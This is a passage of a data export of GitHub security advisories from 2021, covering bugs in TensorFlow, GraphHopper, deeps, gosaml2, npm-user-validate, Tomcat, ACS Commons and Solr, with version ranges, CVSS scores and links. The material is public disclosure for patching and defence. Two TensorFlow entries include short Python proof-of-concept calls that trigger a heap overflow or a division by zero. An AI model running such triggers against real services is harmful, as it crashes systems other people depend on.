'2.3.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.4.0'}, {'fixed': '2.4.2'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.1.4'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.2.0'}, {'fixed': '2.2.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.3.0'}, {'fixed': '2.3.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.4.0'}, {'fixed': '2.4.2'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/tensorflow/tensorflow/security/advisories/GHSA-m3f9-w3p3-p669'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-29535'}, {'type': 'WEB', 'url': 'https://github.com/tensorflow/tensorflow/commit/efea03b38fb8d3b81762237dc85e579cc5fc6e87'}]","{'cwe_ids': ['CWE-131', 'CWE-787'], 'severity': 'LOW', 'github_reviewed': True, 'github_reviewed_at': '2021-05-18T22:38:55Z', 'nvd_published_at': '2021-05-14T20:15:00Z'}" +1.4.0,GHSA-hf44-3mx6-vhhw,2021-05-19T19:49:11Z,2021-05-19T23:02:57Z,,['CVE-2021-29506'],Navigate endpoint is vulnerable to regex injection that may lead to Denial of Service.,"### Impact +The regex injection that may lead to Denial of Service. + +### Patches +Will be patched in 2.4 and 3.0 + +### Workarounds +Versions lower than 2.x are only affected if the navigation module is added + +### References +See this pull request for the fix: https://github.com/graphhopper/graphhopper/pull/2304 + +If you have any questions or comments about this advisory please [send us an Email](https://www.graphhopper.com/contact-form/) or create a topic [here](https://discuss.graphhopper.com/).","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H'}]","[{'package': {'ecosystem': 'Maven', 'name': 'com.graphhopper:graphhopper-nav'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.4'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/graphhopper/graphhopper/security/advisories/GHSA-hf44-3mx6-vhhw'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-29506'}, {'type': 'WEB', 'url': 'https://github.com/graphhopper/graphhopper/pull/2304'}, {'type': 'WEB', 'url': 'https://github.com/graphhopper/graphhopper/commit/eb189be1fa7443ebf4ae881e737a18f818c95f41'}]","{'cwe_ids': ['CWE-400'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-05-19T19:49:11Z', 'nvd_published_at': '2021-05-13T19:15:00Z'}" +1.4.0,GHSA-rgfv-v3jh-7ffp,2021-05-05T18:56:42Z,2021-05-06T18:11:52Z,,['CVE-2020-7716'],Prototype Pollution in deeps,All versions of package deeps up to and including version 1.4.5 are vulnerable to Prototype Pollution via the set function.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'npm', 'name': 'deeps'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '1.4.5'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-7716'}, {'type': 'WEB', 'url': 'https://snyk.io/vuln/SNYK-JS-DEEPS-598667'}]","{'cwe_ids': ['CWE-1321'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2021-05-05T18:56:42Z', 'nvd_published_at': '2020-09-01T10:15:00Z'}" +1.4.0,GHSA-8c89-2vwr-chcq,2021-05-18T22:35:23Z,2021-05-21T14:22:35Z,,['CVE-2021-29537'],Heap buffer overflow in `QuantizedResizeBilinear`,"### Impact +An attacker can cause a heap buffer overflow in `QuantizedResizeBilinear` by passing in invalid thresholds for the quantization: + +```python +import tensorflow as tf + +images = tf.constant([], shape=[0], dtype=tf.qint32) +size = tf.constant([], shape=[0], dtype=tf.int32) +min = tf.constant([], dtype=tf.float32) +max = tf.constant([], dtype=tf.float32) + +tf.raw_ops.QuantizedResizeBilinear(images=images, size=size, min=min, max=max, align_corners=False, half_pixel_centers=False) +``` + +This is because the [implementation](https://github.com/tensorflow/tensorflow/blob/50711818d2e61ccce012591eeb4fdf93a8496726/tensorflow/core/kernels/quantized_resize_bilinear_op.cc#L705-L706) assumes that the 2 arguments are always valid scalars and tries to access the numeric value directly: + +```cc +const float in_min = context->input(2).flat()(0); +const float in_max = context->input(3).flat()(0); +``` + +However, if any of these tensors is empty, then `.flat()` is an empty buffer and accessing the element at position 0 results in overflow. + +### Patches +We have patched the issue in GitHub commit [f6c40f0c6cbf00d46c7717a26419f2062f2f8694](https://github.com/tensorflow/tensorflow/commit/f6c40f0c6cbf00d46c7717a26419f2062f2f8694). + +The fix will be included in TensorFlow 2.5.0. We will also cherrypick this commit on TensorFlow 2.4.2, TensorFlow 2.3.3, TensorFlow 2.2.3 and TensorFlow 2.1.4, as these are also affected and still in supported range. + +### For more information +Please consult [our security guide](https://github.com/tensorflow/tensorflow/blob/master/SECURITY.md) for more information regarding the security model and how to contact us with issues and questions. + +### Attribution +This vulnerability has been reported by Ying Wang and Yakun Zhang of Baidu X-Team.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:L'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.1.4'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.2.0'}, {'fixed': '2.2.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.3.0'}, {'fixed': '2.3.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.4.0'}, {'fixed': '2.4.2'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.1.4'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.2.0'}, {'fixed': '2.2.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.3.0'}, {'fixed': '2.3.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.4.0'}, {'fixed': '2.4.2'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.1.4'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.2.0'}, {'fixed': '2.2.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.3.0'}, {'fixed': '2.3.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.4.0'}, {'fixed': '2.4.2'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/tensorflow/tensorflow/security/advisories/GHSA-8c89-2vwr-chcq'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-29537'}, {'type': 'WEB', 'url': 'https://github.com/tensorflow/tensorflow/commit/f6c40f0c6cbf00d46c7717a26419f2062f2f8694'}]","{'cwe_ids': ['CWE-131', 'CWE-787'], 'severity': 'LOW', 'github_reviewed': True, 'github_reviewed_at': '2021-05-18T22:35:23Z', 'nvd_published_at': '2021-05-14T20:15:00Z'}" +1.4.0,GHSA-5684-g483-2249,2021-10-05T17:07:09Z,2021-05-24T16:59:47Z,,[],Signature Validation Bypass,"### Impact +Given a valid SAML Response, an attacker can potentially modify the document, bypassing signature validation in order to pass off the altered document as a signed one. + +This enables a variety of attacks, including users accessing accounts other than the one to which they authenticated in the identity provider, or full authentication bypass if an external attacker can obtain an expired, signed SAML Response. + +### Patches +A patch is available, users of gosaml2 should upgrade to v0.5.0 or higher. + +### References +See the [underlying advisory on goxmldsig](https://github.com/russellhaering/goxmldsig/security/advisories/GHSA-q547-gmf8-8jr7) for more details.",[],"[{'package': {'ecosystem': 'Go', 'name': 'github.com/russellhaering/gosaml2'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '0.5.0'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/russellhaering/gosaml2/security/advisories/GHSA-5684-g483-2249'}, {'type': 'PACKAGE', 'url': 'https://github.com/russellhaering/gosaml2'}]","{'cwe_ids': ['CWE-347'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2021-05-21T22:17:56Z', 'nvd_published_at': None}" +1.4.0,GHSA-xm2v-8rrw-w9pm,2021-05-18T23:17:46Z,2021-05-21T14:21:51Z,,['CVE-2021-29525'],Division by 0 in `Conv2DBackpropInput`,"### Impact +An attacker can trigger a division by 0 in `tf.raw_ops.Conv2DBackpropInput`: + +```python +import tensorflow as tf + +input_tensor = tf.constant([52, 1, 1, 5], shape=[4], dtype=tf.int32) +filter_tensor = tf.constant([], shape=[0, 1, 5, 0], dtype=tf.float32) +out_backprop = tf.constant([], shape=[52, 1, 1, 0], dtype=tf.float32) + +tf.raw_ops.Conv2DBackpropInput(input_sizes=input_tensor, filter=filter_tensor, + out_backprop=out_backprop, strides=[1, 1, 1, 1], + use_cudnn_on_gpu=True, padding='SAME', + explicit_paddings=[], data_format='NHWC', + dilations=[1, 1, 1, 1]) +``` + +This is because the [implementation](https://github.com/tensorflow/tensorflow/blob/b40060c9f697b044e3107917c797ba052f4506ab/tensorflow/core/kernels/conv_grad_input_ops.h#L625-L655) does a division by a quantity that is controlled by the caller: + +```cc + const size_t size_A = output_image_size * dims.out_depth; + const size_t size_B = filter_total_size * dims.out_depth; + const size_t size_C = output_image_size * filter_total_size; + const size_t work_unit_size = size_A + size_B + size_C; + ... + const size_t shard_size = + use_parallel_contraction ? 1 : + (target_working_set_size + work_unit_size - 1) / work_unit_size; +``` + +### Patches +We have patched the issue in GitHub commit [2be2cdf3a123e231b16f766aa0e27d56b4606535](https://github.com/tensorflow/tensorflow/commit/2be2cdf3a123e231b16f766aa0e27d56b4606535). + +The fix will be included in TensorFlow 2.5.0. We will also cherrypick this commit on TensorFlow 2.4.2, TensorFlow 2.3.3, TensorFlow 2.2.3 and TensorFlow 2.1.4, as these are also affected and still in supported range. + +### For more information +Please consult [our security guide](https://github.com/tensorflow/tensorflow/blob/master/SECURITY.md) for more information regarding the security model and how to contact us with issues and questions. + +### Attribution +This vulnerability has been reported by Yakun Zhang and Ying Wang of Baidu X-Team.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:L'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.1.4'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.2.0'}, {'fixed': '2.2.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.3.0'}, {'fixed': '2.3.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.4.0'}, {'fixed': '2.4.2'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.1.4'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.2.0'}, {'fixed': '2.2.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.3.0'}, {'fixed': '2.3.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.4.0'}, {'fixed': '2.4.2'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.1.4'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.2.0'}, {'fixed': '2.2.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.3.0'}, {'fixed': '2.3.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.4.0'}, {'fixed': '2.4.2'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/tensorflow/tensorflow/security/advisories/GHSA-xm2v-8rrw-w9pm'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-29525'}, {'type': 'WEB', 'url': 'https://github.com/tensorflow/tensorflow/commit/2be2cdf3a123e231b16f766aa0e27d56b4606535'}]","{'cwe_ids': ['CWE-369'], 'severity': 'LOW', 'github_reviewed': True, 'github_reviewed_at': '2021-05-18T23:17:46Z', 'nvd_published_at': '2021-05-14T20:15:00Z'}" +1.4.0,GHSA-pw54-mh39-w3hc,2021-04-20T17:21:44Z,2021-05-10T19:08:15Z,,['CVE-2020-7754'],Regular expression denial of service in npm-user-validate,This affects the package npm-user-validate before 1.0.1. The regex that validates user emails took exponentially longer to process long input strings beginning with @ characters.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H'}]","[{'package': {'ecosystem': 'npm', 'name': 'npm-user-validate'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.0.1'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/npm/npm-user-validate/security/advisories/GHSA-xgh6-85xh-479p'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-7754'}, {'type': 'WEB', 'url': 'https://github.com/npm/npm-user-validate/commit/c8a87dac1a4cc6988b5418f30411a8669bef204e'}, {'type': 'WEB', 'url': 'https://snyk.io/vuln/SNYK-JAVA-ORGWEBJARSNPM-1019353'}, {'type': 'WEB', 'url': 'https://snyk.io/vuln/SNYK-JS-NPMUSERVALIDATE-1019352'}]","{'cwe_ids': ['CWE-400'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-04-20T17:21:44Z', 'nvd_published_at': '2020-10-27T15:15:00Z'}" +1.4.0,GHSA-2rvv-w9r2-rg7m,2021-04-06T21:27:31Z,2021-05-13T22:30:02Z,,['CVE-2021-24122'],Information Disclosure in Apache Tomcat,"When serving resources from a network location using the NTFS file system, Apache Tomcat versions 10.0.0-M1 to 10.0.0-M9, 9.0.0.M1 to 9.0.39, 8.5.0 to 8.5.59 and 7.0.0 to 7.0.106 were susceptible to JSP source code disclosure in some configurations. The root cause was the unexpected behaviour of the JRE API File.getCanonicalPath() which in turn was caused by the inconsistent behaviour of the Windows API (FindFirstFileW) in some circumstances.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N'}]","[{'package': {'ecosystem': 'Maven', 'name': 'org.apache.tomcat.embed:tomcat-embed-core'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '10.0.0-M1'}, {'fixed': '10.0.0-M10'}]}], 'database_specific': {'last_known_affected_version_range': '<= 10.0.0-M9'}}, {'package': {'ecosystem': 'Maven', 'name': 'org.apache.tomcat.embed:tomcat-embed-core'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '9.0.0'}, {'fixed': '9.0.40'}]}]}, {'package': {'ecosystem': 'Maven', 'name': 'org.apache.tomcat.embed:tomcat-embed-core'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '8.5.0'}, {'fixed': '8.5.60'}]}]}, {'package': {'ecosystem': 'Maven', 'name': 'org.apache.tomcat.embed:tomcat-embed-core'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '7.0.0'}, {'fixed': '7.0.107'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-24122'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r1595889b083e05986f42b944dc43060d6b083022260b6ea64d2cec52%40%3Cannounce.tomcat.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r1595889b083e05986f42b944dc43060d6b083022260b6ea64d2cec52@%3Cannounce.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r1595889b083e05986f42b944dc43060d6b083022260b6ea64d2cec52@%3Cannounce.tomcat.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r7382e1e35b9bc7c8f320b90ad77e74c13172d08034e20c18000fe710@%3Cdev.tomee.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r776c64337495bf28b7d5597268114a888e3fad6045c40a0da0c66d4d@%3Cdev.tomee.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r7e0bb9ea415724550e2b325e143b23e269579e54d66fcd7754bd0c20@%3Cdev.tomcat.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rb32a73b7cb919d4f44a2596b6b951274c0004fc8b0e393d6829a45f9@%3Cusers.tomcat.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rca833c6d42b7b9ce1563488c0929f29fcc95947d86e5e740258c8937@%3Cdev.tomcat.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.debian.org/debian-lts-announce/2021/03/msg00018.html'}, {'type': 'WEB', 'url': 'https://security.netapp.com/advisory/ntap-20210212-0008/'}, {'type': 'WEB', 'url': 'https://www.oracle.com//security-alerts/cpujul2021.html'}, {'type': 'WEB', 'url': 'http://www.openwall.com/lists/oss-security/2021/01/14/1'}]","{'cwe_ids': ['CWE-200', 'CWE-706'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-04-06T21:27:31Z', 'nvd_published_at': '2021-01-14T15:15:00Z'}" +1.4.0,GHSA-7r83-w6r8-fh6w,2021-12-13T21:34:08Z,2021-05-13T22:31:14Z,,['CVE-2021-21043'],Reflected Cross-site Scripting (XSS) in ACS Commons,ACS Commons version 4.9.2 (and earlier) suffers from a Reflected Cross-site Scripting (XSS) vulnerability in version-compare and page-compare due to invalid JCR characters that are not handled correctly. An attacker could potentially exploit this vulnerability to inject malicious JavaScript content into vulnerable form fields and execute it within the context of the victim's browser. Exploitation of this issue requires user interaction in order to be successful.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N'}]","[{'package': {'ecosystem': 'Maven', 'name': 'com.adobe.acs:acs-aem-commons'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '4.10.0'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/Adobe-Consulting-Services/acs-aem-commons/security/advisories/GHSA-f92j-qf46-p6vm'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-21043'}, {'type': 'WEB', 'url': 'https://github.com/Adobe-Consulting-Services/acs-aem-commons/commit/14d769c86606c4ce9a93c47a19f87e1ad72788d6'}, {'type': 'PACKAGE', 'url': 'https://github.com/Adobe-Consulting-Services/acs-aem-commons'}, {'type': 'WEB', 'url': 'https://helpx.adobe.com/security/products/indesign/apsb21-22.html'}]","{'cwe_ids': ['CWE-787', 'CWE-79'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-04-05T21:38:56Z', 'nvd_published_at': '2021-02-02T23:15:00Z'}" +1.4.0,GHSA-vf7p-j8x6-xvwp,2021-04-23T18:49:03Z,2021-05-10T15:17:58Z,,['CVE-2021-29943'],Incorrect Authorization in Apache Solr,"When using ConfigurableInternodeAuthHadoopPlugin for authentication, Apache Solr versions prior to 8.8.2 would forward/proxy distributed requests using server credentials instead of original client credentials. This would result in incorrect authorization resolution on the receiving hosts.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N'}]","[{'package': {'ecosystem': 'Maven', 'name': 'org.apache.solr:solr-parent'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '8.8.2'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-29943'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r91dd0ff556e0c9aab4c92852e0e540c59d4633718ce12881558cf44d%40%3Cusers.solr.apache.org%3E'}, {'type': 'WEB', 'url': 'https://security.netapp.com/advisory/ntap-20210604-0009/'}]","{'cwe_ids': ['CWE-863'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2021-04-14T15:14:38Z', 'nvd_published_at': '2021-04-13T07:15:00Z'}" +1.4.0,GHSA-vf94-36g5-69v8,2021-05-17T23:06:31Z,2021-05-21T14:27:49Z,,['CVE-2021-29595'],Division by zero in TFLite's implementation of `DepthToSpace`,"### Impact +The implementation of the `DepthToSpace` TFLite operator is [vulnerable to a division by zero error](https://github.com/tensorflow/tensorflow/blob/0d45ea1ca641b21b73bcf9c00e0179cda284e7e7/tensorflow/lite/kernels/depth_to_space.cc#L63-L69): + +```cc +const int block_size = params->block_size; +... +const int input_channels = input->dims->data[3]; +... +int output_channels = input_channels / block_size / block_size; +``` + +An attacker can craft a model such that `params->block_size` is 0. + +### Patches +We have patched the issue in GitHub commit [106d8f4fb89335a2c52d7c895b7a7485465ca8d9](https://github.com/tensorflow/tensorflow/commit/106d8f4fb89335a2c52d7c895b7a7485465ca8d9). + +The fix will be included in TensorFlow 2.5.0. We will also cherrypick this commit on TensorFlow 2.4.2, TensorFlow 2.3.3, TensorFlow 2.2.3 and TensorFlow 2.1.4, as these are also affected and still in supported range. + +### For more information +Please consult [our security guide](https://github.com/tensorflow/tensorflow/blob/master/SECURITY.md) for more information regarding the security model and how to contact us with issues and questions. + +### Attribution +This vulnerability has been reported by members of the Aivul Team from Qihoo 360.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:L'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.1.4'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.2.0'}, {'fixed': '2.2.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.3.0'}, {'fixed': '2.3.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.4.0'}, {'fixed': '2.4.2'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.1.4'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.2.0'}, {'fixed': '2.2.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.3.0'}, {'fixed': '2.3.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.4.0'}, {'fixed': '2.4.2'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.1.4'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.2.0'}, {'fixed': '2.2.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.3.0'}, {'fixed': '2.3.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.4.0'}, {'fixed': '2.4.2'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/tensorflow/tensorflow/security/advisories/GHSA-vf94-36g5-69v8'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-29595'}, {'type': 'WEB', 'url': 'https://github.com/tensorflow/tensorflow/commit/106d8f4fb89335a2c52d7c895b7a7485465ca8d9'}]","{'cwe_ids': ['CWE-369'], 'severity': 'LOW', 'github_reviewed': True, 'github_reviewed_at': '2021-05-17T23:06:31Z', 'nvd_published_at': '2021-05-14T20:15:00Z'}" +1.4.0,GHSA-cfx7-2xpc-8w4h,2021-05-18T15:44:05Z,2021-05-21T14:27:01Z,,['CVE-2021-29593'],Division by zero in TFLite's implementation of `BatchToSpaceNd`,"### Impact +The implementation of the `BatchToSpaceNd` TFLite operator is [vulnerable to a division by zero error](https://github.com/tensorflow/tensorflow/blob/b5ed552fe55895aee8bd8b191f744a069957d18d/tensorflow/lite/kernels/batch_to_space_nd.cc#L81-L82): + +```cc +TF_LITE_ENSURE_EQ(context, output_batch_size % block_shape[dim], 0); +output_batch_size = output_batch_size / block_shape[dim]; +``` + +An attacker can craft a model such that one dimension of the `block` input is 0. Hence, the corresponding value in `block_shape` is 0. + +### Patches +We have patched the issue in GitHub commit [2c74674348a4708ced58ad6eb1b23354df8ee044](https://github.com/tensorflow/tensorflow/commit/2c74674348a4708ced58ad6eb1b23354df8ee044). + +The fix will be included in TensorFlow 2.5.0. We will also cherrypick this commit on TensorFlow 2.4.2, TensorFlow 2.3.3, TensorFlow 2.2.3 and TensorFlow 2.1.4, as these are also affected and still in supported range. + +### For more information +Please consult [our security guide](https://github.com/tensorflow/tensorflow/blob/master/SECURITY.md) for more information regarding the security model and how to contact us with issues and questions. + +### Attribution +This vulnerability has been reported by members of the Aivul Team from Qihoo 360.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:L'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.1.4'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.2.0'}, {'fixed': '2.2.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.3.0'}, {'fixed': '2.3.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.4.0'}, {'fixed': '2.4.2'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/tensorflow/tensorflow/security/advisories/GHSA-cfx7-2xpc-8w4h'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-29593'}, {'type': 'WEB', 'url': 'https://github.com/tensorflow/tensorflow/commit/2c74674348a4708ced58ad6eb1b23354df8ee044'}]","{'cwe_ids': ['CWE-369'], 'severity': 'LOW', 'github_reviewed': True, 'github_reviewed_at': '2021-05-18T15:44:05Z', 'nvd_published_at': '2021-05-14T20:15:00Z'}" 